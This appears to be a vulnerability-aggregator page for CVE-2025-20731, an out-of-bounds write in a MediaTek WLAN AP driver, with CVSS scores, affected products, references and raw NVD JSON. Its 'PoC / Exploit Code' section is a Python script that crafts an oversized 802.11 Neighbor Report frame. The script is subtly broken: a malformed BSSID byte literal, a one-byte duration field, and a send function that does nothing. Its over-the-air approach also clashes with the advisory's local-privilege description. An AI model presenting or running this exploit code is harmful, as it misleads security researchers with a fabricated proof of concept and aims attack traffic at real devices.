CVE-2025-20731

Description

In wlan AP driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege (when OceReducedNeighborReport is disabled). User interaction is not needed for exploitation. Patch ID: WCNCR00441511; Issue ID: MSV-4140.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mediatek:software_development_kit:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:openwrt:openwrt:19.07.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:openwrt:openwrt:21.02.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:mediatek:mt7615:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:mediatek:mt7622:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:mediatek:mt7663:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:mediatek:mt7915:-:*:*:*:*:*:*:* - NOT VULNERABLE

MediaTek WLAN AP Driver (OceReducedNeighborReport功能受影响)

使用MediaTek芯片的无线设备 (具体版本需参考厂商公告)

WCNCR00441511补丁之前的驱动版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-20731 PoC - MediaTek WLAN AP Driver Out-of-Bounds Write
# This PoC demonstrates the vulnerability in OceReducedNeighborReport handling
# Note: Requires system-level access to send raw 802.11 frames

import struct

def create_malicious_neighbor_report():
    """
    Create a malicious IEEE 802.11 Neighbor Report with oversized elements
    to trigger out-of-bounds write in MediaTek wlan AP driver
    """
    # Frame Control
    frame_control = struct.pack('<H', 0x00d0)  # Action frame, To DS
    
    # Duration
    duration = struct.pack('<B', 0x00)
    
    # Receiver Address (AP)
    receiver_addr = b'\xaa\xbb\xcc\xdd\xee\xff'
    
    # Transmitter Address
    transmitter_addr = b'\x11\x22\x33\x44\x55\x66'
    
    # BSSID
    bssid = b'\xaa\xbb\+cc\xdd\xee\xff'
    
    # Sequence Control
    seq_ctrl = struct.pack('<H', 0x0000)
    
    # Category: Radio Measurement (5)
    category = struct.pack('<B', 0x05)
    
    # Action: Neighbor Report Response (5)
    action = struct.pack('<B', 0x05)
    
    # Element ID 51: Neighbor Report
    element_id = struct.pack('<B', 0x35)
    
    # Malicious length - exceeds driver boundary check
    # Trigger out-of-bounds write by setting oversized element length
    malicious_length = struct.pack('<B', 0xFF)  # Oversized length
    
    # BSSID in neighbor report
    neighbor_bssid = b'\xaa\xbb\xcc\xdd\xee\xff'
    
    # BSSID Information
    bssid_info = struct.pack('<I', 0x00000000)
    
    # Operating Class, Channel Number, Phy Type
    operating_class = struct.pack('<B', 0x04)
    channel_number = struct.pack('<B', 0x06)
    phy_type = struct.pack('<B', 0x0C)
    
    # Assemble the malicious element
    malicious_element = element_id + malicious_length + neighbor_bssid + bssid_info + operating_class + channel_number + phy_type
    
    # Pad with additional data to trigger overflow
    padding = b'\x41' * 256  # Padding to trigger OOB write
    
    # Assemble complete frame
    frame = frame_control + duration + receiver_addr + transmitter_addr + bssid + seq_ctrl
    frame += category + action + malicious_element + padding
    
    return frame

def send_malicious_frame(interface):
    """
    Send the malicious 802.11 frame to trigger vulnerability
    Requires: System-level privileges, raw socket capabilities
    """
    # Note: Actual implementation requires root privileges and raw socket support
    # This is for demonstration purposes only
    pass

if __name__ == '__main__':
    print('[+] CVE-2025-20731 MediaTek WLAN AP Driver OOB Write PoC')
    print('[+] Target: MediaTek wlan AP driver (OceReducedNeighborReport disabled)')
    print('[+] Prerequisite: System-level privileges required')
    frame = create_malicious_neighbor_report()
    print(f'[+] Generated malicious frame: {len(frame)} bytes')
    print('[+] Send frame using raw 802.11 socket with system privileges')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-20731
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-20731
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-20731/
[4] VulDB https://vuldb.com/cve/CVE-2025-20731
[5] https://corp.mediatek.com/product-security-bulletin/November-2025

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-20731", "sourceIdentifier": "[email protected]", "published": "2025-11-04T07:15:37.117", "lastModified": "2026-02-26T19:29:19.750", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In wlan AP driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege (when OceReducedNeighborReport is disabled). User interaction is not needed for exploitation. Patch ID: WCNCR00441511; Issue ID: MSV-4140."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mediatek:software_development_kit:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.6.7.2", "matchCriteriaId": "0DD86CC1-BD46-42D2-9112-190CCAC96B30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:19.07.0:-:*:*:*:*:*:*", "matchCriteriaId": "4FA469E2-9E63-4C9A-8EBA-10C8C870063A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:openwrt:openwrt:21.02.0:-:*:*:*:*:*:*", "matchCriteriaId": "F0133207-2EED-4625-854F-8DB7770D5BF7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt6890:-:*:*:*:*:*:*:*", "matchCriteriaId": "171D1C08-F055-44C0-913C-AA2B73AF5B72"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7615:-:*:*:*:*:*:*:*", "matchCriteriaId": "05748BB1-0D48-4097-932E-E8E2E574FD8D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7622:-:*:*:*:*:*:*:*", "matchCriteriaId": "55EB4B27-6264-45BE-9A22-BE8418BB0C06"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7663:-:*:*:*:*:*:*:*", "matchCriteriaId": "10C79211-F064-499D-914E-0BACD038FBF4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7915:-:*:*:*:*:*:*:*", "matchCriteriaId": "3AB22996-9C22-4B6C-9E94-E4C055D16335"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7916:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD5AA441-5381-4179-89EB-1642120F72B4"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7981:-:*:*:*:*:*:*:*", "matchCriteriaId": "490CD97B-021F-4350-AEE7-A2FA866D5889"}, {"vulnerable": false, "criteria": "cpe:2.3:h:mediatek:mt7986:-:*:*:*:*:*:*:*", "matchCriteriaId": "40A9E917-4B34-403F-B512-09EEBEA46811"}]}]}], "references": [{"url": "https://corp.mediatek.com/product-security-bulletin/November-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}